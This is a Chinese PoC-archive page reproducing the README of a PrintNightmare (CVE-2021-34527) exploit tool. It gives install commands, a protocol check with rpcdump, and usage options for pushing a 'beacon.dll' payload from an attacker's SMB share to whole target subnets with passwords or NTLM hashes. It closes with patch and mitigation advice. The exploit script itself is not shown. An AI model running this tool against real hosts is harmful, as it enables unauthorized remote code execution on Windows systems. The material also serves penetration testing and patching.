关联漏洞
标题:
Microsoft Windows Print Spooler Components 安全漏洞
(CVE-2021-34527)
描述:Microsoft Windows Print Spooler Components是美国微软(Microsoft)公司的一个打印后台处理程序组件。 Microsoft Windows Print Spooler Components 存在安全漏洞,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1
描述
PrintNightmare (CVE-2021-34527) PoC Exploit
介绍
# PrintNightmare (CVE-2021-34527)
This version of the PrintNightmare exploit is based on the code created by [Cube0x0](https://github.com/cube0x0/CVE-2021-1675), with the following features:
* Ability to target multiple hosts.
* Built-in SMB server for payload delivery, removing the need for open file shares.
* Exploit includes both `MS-RPRN` & `MS-PAR` protocols (*define in CMD args*).
* Implements [@gentilkiwi's](https://twitter.com/gentilkiwi) [UNC bypass](https://twitter.com/gentilkiwi/status/1412771368534528001) technique.
## Installation
Before running, install the latest version of [impacket](https://github.com/SecureAuthCorp/impacket):
```commandline
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install
git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h
```
## Test
Impacket's `rpcdump.py` can be used to check for `MS-PAR` and `MS-RPRN` protocols:
```
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
```
Alternatively, [byt3bl33d3r's](https://twitter.com/byt3bl33d3r) scanner [ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream) can be used to scan targets and validate the PrintNightmare RCE vulnerability.
## Screenshots
## Usage
```text
-v VERBOSE Enable verbose logging from SMB server
-t TIMEOUT Connection timeout
Authentication:
-u USERNAME Set username
-H HASH, -hashes Use NTLM Hash for authentication
-p PASSWORD Set password
-d DOMAIN Set domain
--local-auth Authenticate to target host, no domain
DLL Execution:
-dll DLL Path to local DLL file to execute "beacon.dll"
--remote-dll REMOTE_DLL Remote dll "\\192.168.1.25\Share\beacon.dll"
-share SHARE Set local SMB share name
--local-ip LOCAL_IP Set local IP (defaults to primary interface)
Target(s):
-pDriverPath PDRIVERPATH Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
-port [destination port] Destination port to connect to SMB Server
-proto {MS-RPRN,MS-PAR} Target protocol (Default=MS-RPRN)
target 192.168.2.2, target.txt, 10.0.0.0/24 (positional)
```
## Remediation
Microsoft has released several patches for PrintNightmare, the latest being on Patch Tuesday of September 2021. This addressed the underlying vulnerability and later workarounds discovered. For more information, visit Microsoft's official guidance:
[https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
Additional [strategies](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527#workarounds) for mitigating this vulnerability include:
* Disabling the Print Spooler service on non-essential systems.
* Disable inbound remote printing through Group Policy
## Acknowledgement
* [@cube0x0](https://twitter.com/cube0x0) - for the Python [exploit](https://github.com/cube0x0/CVE-2021-1675) code and his contributions to the [impacket](https://github.com/SecureAuthCorp/impacket) project.
* [@edwardzpeng](https://twitter.com/edwardzpeng) & [@lxf02942370](https://twitter.com/lxf02942370)- for the initial discovery and exploit of PrintNightmare.
文件快照
[4.0K] /data/pocs/6fdfb5e3e858f71b0a84ca5d32902836c60dc9a8
├── [ 17K] CVE-2021-34527.py
└── [3.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。